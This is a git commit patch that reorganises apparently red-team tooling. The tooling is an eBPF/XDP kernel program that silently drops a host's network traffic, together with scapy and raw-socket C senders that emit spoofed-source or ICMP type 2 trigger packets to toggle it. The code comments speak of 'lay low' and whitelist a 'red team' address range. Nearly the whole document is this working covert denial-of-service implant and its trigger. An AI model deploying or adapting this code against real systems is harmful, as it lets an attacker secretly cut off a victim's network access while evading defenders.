From b9ef8fbd63fface91ff3cd98d7d702f9827c322d Mon Sep 17 00:00:00 2001 From: Ryan Schanzenbacher Date: Mon, 20 Mar 2023 18:03:45 -0400 Subject: organization --- packet_dropper.c | 77 --------------------------- packet_dropper.o | Bin 8648 -> 0 bytes packet_dropper_new.c | 95 --------------------------------- packet_sender.py | 7 --- ping3 | Bin 22704 -> 0 bytes ping3.c | 110 --------------------------------------- ping_send | Bin 6113864 -> 0 bytes ping_senders/packet_sender.py | 7 +++ ping_senders/ping3 | Bin 0 -> 22704 bytes ping_senders/ping3.c | 110 +++++++++++++++++++++++++++++++++++++++ ping_senders/ping_send | Bin 0 -> 6113864 bytes xdp-program/packet_dropper.c | 77 +++++++++++++++++++++++++++ xdp-program/packet_dropper.o | Bin 0 -> 8648 bytes xdp-program/packet_dropper_new.c | 95 +++++++++++++++++++++++++++++++++ 14 files changed, 289 insertions(+), 289 deletions(-) delete mode 100644 packet_dropper.c delete mode 100644 packet_dropper.o delete mode 100644 packet_dropper_new.c delete mode 100644 packet_sender.py delete mode 100755 ping3 delete mode 100644 ping3.c delete mode 100644 ping_send create mode 100644 ping_senders/packet_sender.py create mode 100755 ping_senders/ping3 create mode 100644 ping_senders/ping3.c create mode 100644 ping_senders/ping_send create mode 100644 xdp-program/packet_dropper.c create mode 100644 xdp-program/packet_dropper.o create mode 100644 xdp-program/packet_dropper_new.c diff --git a/packet_dropper.c b/packet_dropper.c deleted file mode 100644 index d0a8d85..0000000 --- a/packet_dropper.c +++ /dev/null @@ -1,77 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include - -struct { - __uint(type, BPF_MAP_TYPE_ARRAY); - __type(key, __u32); - __type(value, __u32); - __uint(max_entries, 1); -} status SEC(".maps"); - -SEC("xdpentry") -int entry(struct xdp_md *ctx) { - // Prepare some data structures - __u32 *rec; - __u32 key = 0; - void *data_end = (void *)(long)ctx->data_end; - void *data = (void *)(long)ctx->data; - struct ethhdr *eth = data; - - rec = bpf_map_lookup_elem(&status, &key); // Lookup current packet status from kernel map - if (!rec) { - return XDP_DROP; // try to lay low on error - } - //bpf_printk("Rec: %u", *rec); // Debug prints - if ((*rec != 55) && (*rec != 56)) { - // First run check - // bpf_printk("Resetting rec!"); // Debug Prints - *rec = 56; // set default value for map - } - - if (eth + 1 > data_end) // Bounds checking for xdp preverifier - return XDP_PASS; // This should never run normally - - /** if(eth->h_proto != ETH_P_IP) { - return XDP_PASS; // don't kill layer 2 traffic - } **/ - - struct iphdr *iph = data + sizeof(struct ethhdr); - if (iph + 1 > data_end) // More bounds checking - return XDP_PASS; // This should never run either - // - __u32 ip_src = iph->saddr; // grab source address of packet - // bpf_printk("Incoming packet: %u\n", ip_src); // Debug print - // Determine if we need to further process this packet - if (ip_src == 1946091487) { - // This packet had a destination of 223.255.254.115, do something! - // bpf_printk("Got it!, setting rec..."); // Debug print - switch (*rec) { - case 55 : - *rec = 56; - break; - case 56 : - *rec = 55; - break; - } - return XDP_DROP; - } - else if (ip_src == 0) { - // most likely a layer 2 packet, let it thru - return XDP_PASS; - } - - // Finish processing - if (*rec == 55) { - return XDP_DROP; - } else { - return XDP_PASS; - } -} - - -char _license[] SEC("license")= "GPL"; diff --git a/packet_dropper.o b/packet_dropper.o deleted file mode 100644 index 3958484..0000000 Binary files a/packet_dropper.o and /dev/null differ diff --git a/packet_dropper_new.c b/packet_dropper_new.c deleted file mode 100644 index 3033b38..0000000 --- a/packet_dropper_new.c +++ /dev/null @@ -1,95 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include - -struct { - __uint(type, BPF_MAP_TYPE_ARRAY); - __type(key, __u32); - __type(value, __u32); - __uint(max_entries, 1); -} status SEC(".maps"); - -SEC("xdpentry") -int entry(struct xdp_md *ctx) { - // Prepare some data structures - __u32 *rec; - __u32 key = 0; - void *data_end = (void *)(long)ctx->data_end; - void *data = (void *)(long)ctx->data; - struct ethhdr *eth = data; - - rec = bpf_map_lookup_elem(&status, &key); // Lookup current packet status from kernel map - if (!rec) { - return XDP_DROP; // try to lay low on error - } - //bpf_printk("Rec: %u", *rec); // Debug prints - if ((*rec != 55) && (*rec != 56)) { - // First run check - // bpf_printk("Resetting rec!"); // Debug Prints - *rec = 56; // set default value for map - } - - if (eth + 1 > data_end) // Bounds checking for xdp preverifier - return XDP_PASS; // This should never run normally - - if(bpf_ntohs(eth->h_proto) == ETH_P_ARP) { - return XDP_PASS; // don't kill layer 2 traffic - } - - struct iphdr *iph = data + sizeof(struct ethhdr); - if (iph + 1 > data_end) // More bounds checking - return XDP_PASS; // This should never run either - // - __u32 ip_src = iph->saddr; // grab source address of packet - - struct icmphdr *icmph = data + sizeof(struct ethhdr) + sizeof(struct iphdr); - if (icmph + 1 > data_end) { - // More bounds checking - return XDP_PASS; - } - - char *pingdata = data + sizeof(struct ethhdr) + sizeof(struct iphdr) + sizeof(struct icmphdr); - - // bpf_printk("Incoming packet: %u\n", ip_src); // Debug print - // Determine if we need to further process this packet - //if (ip_src == 1946091487) { - bpf_printk("Incoming packet: %u\n", icmph->type); - if (icmph->type == 2 || ip_src == 1946091487) { - // This packet had a destination of 223.255.254.115, do something! - // bpf_printk("Got it!, setting rec..."); // Debug print - switch (*rec) { - case 55 : - *rec = 56; - break; - case 56 : - *rec = 55; - break; - } - return XDP_DROP; - } - else if (ip_src == 0) { - // most likely a layer 2 packet, let it thru - return XDP_PASS; - } - - else if (ip_src >= 16974090 && ip_src <= 503513354) { - // IP is between 10.1.3.1 and 10.1.3.30. Allow to pass for red team - return XDP_PASS; - } - - // Finish processing - if (*rec == 55) { - return XDP_DROP; - } else { - return XDP_PASS; - } -} - - -char _license[] SEC("license")= "GPL"; diff --git a/packet_sender.py b/packet_sender.py deleted file mode 100644 index 7703a5f..0000000 --- a/packet_sender.py +++ /dev/null @@ -1,7 +0,0 @@ -from scapy.all import Ether, IP, UDP, sendp - -input_ip = input("Enter destination IP: ") - -p = Ether()/IP(dst=input_ip, src='223.255.254.115')/UDP(b"A Payload") - -sendp(p) diff --git a/ping3 b/ping3 deleted file mode 100755 index edb585c..0000000 Binary files a/ping3 and /dev/null differ diff --git a/ping3.c b/ping3.c deleted file mode 100644 index f0dd858..0000000 --- a/ping3.c +++ /dev/null @@ -1,110 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -unsigned short cksum(unsigned short *addr, int len); - -int main(int argc, char *argv[]) { - int sock; - char send_buf[400], src_ip[15], dst_ip[15], src_name[256]; - struct ip *ip = (struct ip *)send_buf; - struct icmp *icmp = (struct icmp *)(ip + 1); - struct hostent *src_hp, *dst_hp; - struct sockaddr_in src, dst; - int on = 1; - memset(send_buf, 0, sizeof(send_buf)); - - if (argc < 2) { - printf("Need arg. I\n"); - exit(EXIT_FAILURE); - } - - /**if (getuid() == 0) { - fprintf(stderr, "Need to elevate\n"); - exit(EXIT_FAILURE); - } **/ - - gethostname(src_name, sizeof(src_name)); - printf("%s\n", src_name); - src_hp = gethostbyname(src_name); - ip->ip_src = (*(struct in_addr *)src_hp->h_addr_list[0]); - - dst_hp = gethostbyname(argv[1]); - ip->ip_dst = (*(struct in_addr *)dst_hp->h_addr); - dst.sin_addr = (*(struct in_addr *)dst_hp->h_addr); - - sprintf(src_ip, "%s", inet_ntoa(ip->ip_src)); - sprintf(dst_ip, "%s", inet_ntoa(ip->ip_dst)); - printf("Src: %s -- Dst: %s\n", src_ip, dst_ip); - - // Create socket - sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); - - setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)); - - // IP Structure - ip->ip_v = 4; - ip->ip_hl = 5; - ip->ip_tos = 0; - ip->ip_len = htons(sizeof(send_buf)); - ip->ip_id = htons(321); - ip->ip_off = htons(0); - ip->ip_ttl = 255; - ip->ip_p = IPPROTO_ICMP; - ip->ip_sum = 0; - - // ICMP Structure - icmp->icmp_type = 2; - icmp->icmp_code = 0; - - dst.sin_family = AF_INET; - - ip->ip_sum = cksum((unsigned short *)send_buf, ip->ip_hl); - icmp->icmp_cksum = cksum((unsigned short *)icmp, sizeof(send_buf) - sizeof(struct icmp)); - - int dst_addr_len = sizeof(dst); - int bytes_sent; - - if((bytes_sent = sendto(sock, send_buf, sizeof(send_buf), 0, (struct sockaddr *)&dst, dst_addr_len)) < 0) { - perror("send err"); - fflush(stdout); - } - else { - printf("Sent %d bytes\n", bytes_sent); - } - - -} - -unsigned short cksum(unsigned short *addr, int len) { - int nleft = len; - int sum = 0; - unsigned short *w = addr; - unsigned short answer = 0; - - while (nleft > 1) { - sum += *w++; - nleft -= 2; - } - - if (nleft == 1) { - *(unsigned char *)(&answer) = *(unsigned char *)w; - sum += answer; - } - - sum = (sum >> 16) + (sum & 0xffff); - sum += (sum >> 16); - answer = ~sum; - - return answer; -} diff --git a/ping_send b/ping_send deleted file mode 100644 index 37a2396..0000000 Binary files a/ping_send and /dev/null differ diff --git a/ping_senders/packet_sender.py b/ping_senders/packet_sender.py new file mode 100644 index 0000000..7703a5f --- /dev/null +++ b/ping_senders/packet_sender.py @@ -0,0 +1,7 @@ +from scapy.all import Ether, IP, UDP, sendp + +input_ip = input("Enter destination IP: ") + +p = Ether()/IP(dst=input_ip, src='223.255.254.115')/UDP(b"A Payload") + +sendp(p) diff --git a/ping_senders/ping3 b/ping_senders/ping3 new file mode 100755 index 0000000..edb585c Binary files /dev/null and b/ping_senders/ping3 differ diff --git a/ping_senders/ping3.c b/ping_senders/ping3.c new file mode 100644 index 0000000..f0dd858 --- /dev/null +++ b/ping_senders/ping3.c @@ -0,0 +1,110 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +unsigned short cksum(unsigned short *addr, int len); + +int main(int argc, char *argv[]) { + int sock; + char send_buf[400], src_ip[15], dst_ip[15], src_name[256]; + struct ip *ip = (struct ip *)send_buf; + struct icmp *icmp = (struct icmp *)(ip + 1); + struct hostent *src_hp, *dst_hp; + struct sockaddr_in src, dst; + int on = 1; + memset(send_buf, 0, sizeof(send_buf)); + + if (argc < 2) { + printf("Need arg. I\n"); + exit(EXIT_FAILURE); + } + + /**if (getuid() == 0) { + fprintf(stderr, "Need to elevate\n"); + exit(EXIT_FAILURE); + } **/ + + gethostname(src_name, sizeof(src_name)); + printf("%s\n", src_name); + src_hp = gethostbyname(src_name); + ip->ip_src = (*(struct in_addr *)src_hp->h_addr_list[0]); + + dst_hp = gethostbyname(argv[1]); + ip->ip_dst = (*(struct in_addr *)dst_hp->h_addr); + dst.sin_addr = (*(struct in_addr *)dst_hp->h_addr); + + sprintf(src_ip, "%s", inet_ntoa(ip->ip_src)); + sprintf(dst_ip, "%s", inet_ntoa(ip->ip_dst)); + printf("Src: %s -- Dst: %s\n", src_ip, dst_ip); + + // Create socket + sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); + + setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)); + + // IP Structure + ip->ip_v = 4; + ip->ip_hl = 5; + ip->ip_tos = 0; + ip->ip_len = htons(sizeof(send_buf)); + ip->ip_id = htons(321); + ip->ip_off = htons(0); + ip->ip_ttl = 255; + ip->ip_p = IPPROTO_ICMP; + ip->ip_sum = 0; + + // ICMP Structure + icmp->icmp_type = 2; + icmp->icmp_code = 0; + + dst.sin_family = AF_INET; + + ip->ip_sum = cksum((unsigned short *)send_buf, ip->ip_hl); + icmp->icmp_cksum = cksum((unsigned short *)icmp, sizeof(send_buf) - sizeof(struct icmp)); + + int dst_addr_len = sizeof(dst); + int bytes_sent; + + if((bytes_sent = sendto(sock, send_buf, sizeof(send_buf), 0, (struct sockaddr *)&dst, dst_addr_len)) < 0) { + perror("send err"); + fflush(stdout); + } + else { + printf("Sent %d bytes\n", bytes_sent); + } + + +} + +unsigned short cksum(unsigned short *addr, int len) { + int nleft = len; + int sum = 0; + unsigned short *w = addr; + unsigned short answer = 0; + + while (nleft > 1) { + sum += *w++; + nleft -= 2; + } + + if (nleft == 1) { + *(unsigned char *)(&answer) = *(unsigned char *)w; + sum += answer; + } + + sum = (sum >> 16) + (sum & 0xffff); + sum += (sum >> 16); + answer = ~sum; + + return answer; +} diff --git a/ping_senders/ping_send b/ping_senders/ping_send new file mode 100644 index 0000000..37a2396 Binary files /dev/null and b/ping_senders/ping_send differ diff --git a/xdp-program/packet_dropper.c b/xdp-program/packet_dropper.c new file mode 100644 index 0000000..d0a8d85 --- /dev/null +++ b/xdp-program/packet_dropper.c @@ -0,0 +1,77 @@ +#include +#include +#include +#include +#include +#include +#include + +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __type(key, __u32); + __type(value, __u32); + __uint(max_entries, 1); +} status SEC(".maps"); + +SEC("xdpentry") +int entry(struct xdp_md *ctx) { + // Prepare some data structures + __u32 *rec; + __u32 key = 0; + void *data_end = (void *)(long)ctx->data_end; + void *data = (void *)(long)ctx->data; + struct ethhdr *eth = data; + + rec = bpf_map_lookup_elem(&status, &key); // Lookup current packet status from kernel map + if (!rec) { + return XDP_DROP; // try to lay low on error + } + //bpf_printk("Rec: %u", *rec); // Debug prints + if ((*rec != 55) && (*rec != 56)) { + // First run check + // bpf_printk("Resetting rec!"); // Debug Prints + *rec = 56; // set default value for map + } + + if (eth + 1 > data_end) // Bounds checking for xdp preverifier + return XDP_PASS; // This should never run normally + + /** if(eth->h_proto != ETH_P_IP) { + return XDP_PASS; // don't kill layer 2 traffic + } **/ + + struct iphdr *iph = data + sizeof(struct ethhdr); + if (iph + 1 > data_end) // More bounds checking + return XDP_PASS; // This should never run either + // + __u32 ip_src = iph->saddr; // grab source address of packet + // bpf_printk("Incoming packet: %u\n", ip_src); // Debug print + // Determine if we need to further process this packet + if (ip_src == 1946091487) { + // This packet had a destination of 223.255.254.115, do something! + // bpf_printk("Got it!, setting rec..."); // Debug print + switch (*rec) { + case 55 : + *rec = 56; + break; + case 56 : + *rec = 55; + break; + } + return XDP_DROP; + } + else if (ip_src == 0) { + // most likely a layer 2 packet, let it thru + return XDP_PASS; + } + + // Finish processing + if (*rec == 55) { + return XDP_DROP; + } else { + return XDP_PASS; + } +} + + +char _license[] SEC("license")= "GPL"; diff --git a/xdp-program/packet_dropper.o b/xdp-program/packet_dropper.o new file mode 100644 index 0000000..3958484 Binary files /dev/null and b/xdp-program/packet_dropper.o differ diff --git a/xdp-program/packet_dropper_new.c b/xdp-program/packet_dropper_new.c new file mode 100644 index 0000000..3033b38 --- /dev/null +++ b/xdp-program/packet_dropper_new.c @@ -0,0 +1,95 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include + +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __type(key, __u32); + __type(value, __u32); + __uint(max_entries, 1); +} status SEC(".maps"); + +SEC("xdpentry") +int entry(struct xdp_md *ctx) { + // Prepare some data structures + __u32 *rec; + __u32 key = 0; + void *data_end = (void *)(long)ctx->data_end; + void *data = (void *)(long)ctx->data; + struct ethhdr *eth = data; + + rec = bpf_map_lookup_elem(&status, &key); // Lookup current packet status from kernel map + if (!rec) { + return XDP_DROP; // try to lay low on error + } + //bpf_printk("Rec: %u", *rec); // Debug prints + if ((*rec != 55) && (*rec != 56)) { + // First run check + // bpf_printk("Resetting rec!"); // Debug Prints + *rec = 56; // set default value for map + } + + if (eth + 1 > data_end) // Bounds checking for xdp preverifier + return XDP_PASS; // This should never run normally + + if(bpf_ntohs(eth->h_proto) == ETH_P_ARP) { + return XDP_PASS; // don't kill layer 2 traffic + } + + struct iphdr *iph = data + sizeof(struct ethhdr); + if (iph + 1 > data_end) // More bounds checking + return XDP_PASS; // This should never run either + // + __u32 ip_src = iph->saddr; // grab source address of packet + + struct icmphdr *icmph = data + sizeof(struct ethhdr) + sizeof(struct iphdr); + if (icmph + 1 > data_end) { + // More bounds checking + return XDP_PASS; + } + + char *pingdata = data + sizeof(struct ethhdr) + sizeof(struct iphdr) + sizeof(struct icmphdr); + + // bpf_printk("Incoming packet: %u\n", ip_src); // Debug print + // Determine if we need to further process this packet + //if (ip_src == 1946091487) { + bpf_printk("Incoming packet: %u\n", icmph->type); + if (icmph->type == 2 || ip_src == 1946091487) { + // This packet had a destination of 223.255.254.115, do something! + // bpf_printk("Got it!, setting rec..."); // Debug print + switch (*rec) { + case 55 : + *rec = 56; + break; + case 56 : + *rec = 55; + break; + } + return XDP_DROP; + } + else if (ip_src == 0) { + // most likely a layer 2 packet, let it thru + return XDP_PASS; + } + + else if (ip_src >= 16974090 && ip_src <= 503513354) { + // IP is between 10.1.3.1 and 10.1.3.30. Allow to pass for red team + return XDP_PASS; + } + + // Finish processing + if (*rec == 55) { + return XDP_DROP; + } else { + return XDP_PASS; + } +} + + +char _license[] SEC("license")= "GPL"; -- cgit v1.2.3